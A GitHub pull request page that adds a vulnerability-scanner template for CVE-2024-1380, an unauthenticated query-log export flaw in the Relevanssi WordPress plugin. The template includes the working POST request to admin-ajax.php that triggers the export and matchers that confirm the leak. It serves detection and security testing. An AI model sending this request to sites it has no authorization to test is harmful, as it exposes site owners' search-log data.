Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added template for CVE-2024-1380 #9978

Merged
merged 3 commits into from
Jun 5, 2024
Merged
Changes from 1 commit
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
36 changes: 36 additions & 0 deletions CVE-2024-1380.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
id: CVE-2024-1380

info:
name: Relevanssi - A Better Search <= 4.22.0 - Unauthenticated Query Log Export
author: FLX
severity: medium
description: |
The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1380
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1380
epss-score: 0.00043
epss-percentile: 0.0866
ritikchaddha marked this conversation as resolved.
Show resolved Hide resolved
tags: wordpress,relevanssi,cve,vulnerability,cve2024

http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"

headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

body: "action=&relevanssi_export=1"

matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "Content-Disposition: attachment;filename=relevanssi_log.csv")'
- 'contains(header, "Content-Type: application/download")'
ritikchaddha marked this conversation as resolved.
Show resolved Hide resolved
Loading